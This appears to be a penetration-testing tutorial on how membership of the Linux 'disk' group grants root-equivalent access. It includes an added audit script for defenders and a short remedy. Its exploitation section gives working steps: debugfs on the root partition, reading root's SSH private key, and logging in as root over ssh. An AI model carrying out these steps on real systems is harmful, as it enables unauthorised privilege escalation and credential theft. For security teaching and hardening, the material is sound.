The disk group gives the user full access to any block device under /dev/. Since /dev/sda1 will in general hold the global file system, and the disk group has full read-write privileges to that device, a member of the disk group can read and write the whole file system regardless of file permissions, which is effectively root.
Identify
1. Check the permissions (group memberships) of the current user
- id
2. The LinEnum script can also help (https://github.com/rebootuser/LinEnum)
- ./LinEnum.sh
3. List the owner and group owner of the devices under /dev
- ls -l /dev
4. Find the devices group-owned by disk
- find /dev -group disk
5. Display the mounted partitions
- df -h
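The Identify checks above can be turned into a small audit that a defender runs on a host, or in a compliance script, to flag accounts that are members of disk and block devices that the group can write to. This is an added example, not part of the original page; the /etc/group line and the `ls -l /dev` output embedded in it are constructed samples, and the function names are my own.

```shell
#!/bin/sh
# Added audit example (not from the original page): report non-root members of
# the disk group and block devices that the disk group can write to.

# Constructed sample of the disk line from /etc/group; on a live host use:
#   getent group disk
SAMPLE_GROUP_LINE='disk:x:6:root,alice'

# Constructed sample of `ls -l /dev` output (names have no /dev/ prefix, as ls prints them)
SAMPLE_LS='brw-rw---- 1 root disk 8, 0 Jan  1 00:00 sda
brw-rw---- 1 root disk 8, 1 Jan  1 00:00 sda1
brw-r----- 1 root disk 8, 2 Jan  1 00:00 sda2
crw-rw-rw- 1 root root 1, 3 Jan  1 00:00 null'

# disk_members GROUP_LINE
# Prints every member of a "name:x:gid:m1,m2" line except root, one per line.
disk_members() {
    printf '%s\n' "$1" | awk -F: '{
        n = split($4, m, ",")
        for (i = 1; i <= n; i++)
            if (m[i] != "" && m[i] != "root") print m[i]
    }'
}

# writable_disk_devices LS_OUTPUT
# Prints /dev/<name> for every block device (type b) whose group owner is disk
# and whose group permission bits include write (6th character of the mode).
writable_disk_devices() {
    printf '%s\n' "$1" | awk '$1 ~ /^b/ && $4 == "disk" && substr($1, 6, 1) == "w" {
        print "/dev/" $NF
    }'
}

# Run against the constructed samples by default; pass --live to audit this host.
if [ "${1:-}" = "--live" ]; then
    echo "Non-root members of disk:"
    disk_members "$(getent group disk)"
    echo "Block devices writable by the disk group:"
    writable_disk_devices "$(ls -l /dev 2>/dev/null)"
else
    echo "Non-root members of disk (sample):"
    disk_members "$SAMPLE_GROUP_LINE"
    echo "Block devices writable by the disk group (sample):"
    writable_disk_devices "$SAMPLE_LS"
fi
```

Any account other than root listed by the first function should be reviewed, since it holds the access described in the Exploitation section. The second function is equivalent to `find /dev -type b -group disk -perm -g=w` on systems with GNU find; the awk version is kept so the script can be exercised offline on captured `ls -l` output.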
Exploitation
1. Knowing our user is part of the disk group, we can use debugfs to enumerate the entire disk with effectively root-level privileges. We also have full read-write access to the disk block files, so we can extract data from them or write arbitrary data to them. With the disk group, we are effectively root, just in a roundabout way. We will explore the partition where the / (root) directory is mounted, in this case /dev/sda2
- debugfs /dev/sda2
2. Inside debugfs we can try to write files; in our case the session is read-only
- cd /root
- ls
- mkdir test
3. Since we don't have write permissions in this case, we can try to read the SSH keys instead
- cd /root/.ssh
- ls
- cat id_rsa
4. Copy the contents of this file into a new file on our local machine and set the proper permissions
- vi id_rsa
- chmod 600 id_rsa
5. Now use that key to log into the server as root
- ssh -i id_rsa root@192.168.244.181
Remedy
Avoid adding users to the disk group, since membership is equivalent to root access to every block device.